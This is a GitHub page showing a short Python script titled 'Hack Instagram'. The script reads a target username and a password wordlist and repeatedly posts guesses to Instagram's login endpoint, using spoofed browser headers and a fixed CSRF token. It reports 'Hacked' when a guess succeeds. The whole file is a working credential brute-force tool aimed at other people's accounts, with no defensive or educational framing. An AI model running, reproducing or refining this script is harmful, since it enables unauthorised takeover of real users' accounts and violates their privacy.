-
Notifications
You must be signed in to change notification settings - Fork 3
/
Copy pathhack-instagram.py
75 lines (57 loc) · 2 KB
/
hack-instagram.py
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
import requests
import time
import random
import string
#تهكير انستغرام
#Hack Instagram
A = '\033[1;10m'
B = '\033[1;30m'
C ='\033[1;36m'
D =('='*40)
print(f"""{A}{D}
<>---<>---<>---<>---<>---<>---<>---<>---<>
[*] Hack Instagram [*]
<>---<>---<>---<>---<>---<>---<>---<>---<>
>> Naplon ◕_◕ <<
_ _ _
| \ | | | |
| \| | __ _ _ __ | | ___ _ __
| . ` |/ _` | '_ \| |/ _ \| '_ \
| |\ | (_| | |_) | | (_) | | | |{C}
|_| \_|\__,_| .__/|_|\___/|_| |_|
| | instagram: 3h6h
|_| Telegram: naplon
Snapchat: ii42
<>---<>---<>---<>---<>---<>---<>---<>
{D}""")
session = requests.Session()
user = input('user: ')
password = input("enter password file name: ")
file = open(f"{password}", "r")
def insta():
while True:
password = file.readline().split('\n')[0]
url = "https://www.instagram.com/accounts/login/ajax/"
headers = {
'user-agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36',
'x-csrftoken': 'jHu55ttlksoa24nBYiVdJ9D7wKaSTCwD',
'x-instagram-ajax': '5d8ba0e5398d',
'x-ig-app-id': '936619743392459'
}
tim = str(time.time()).split(".")[1]
data = {
'username': f'{user}',
'enc_password': f'#PWD_INSTAGRAM_BROWSER:0:{tim}:{password}',
'queryParams': {},
'optIntoOneTap': 'false'
}
req = session.post(url, headers=headers, data=data).text
if ('"authenticated":true') in req:
print(f"Hacked user:{user} pass:{password}")
input("")
elif '"checkpoint_url"' in req:
print("sre.. !")
else:
print(f"Not Hacked user:{user} pass:{password}")
time.sleep(3)
insta()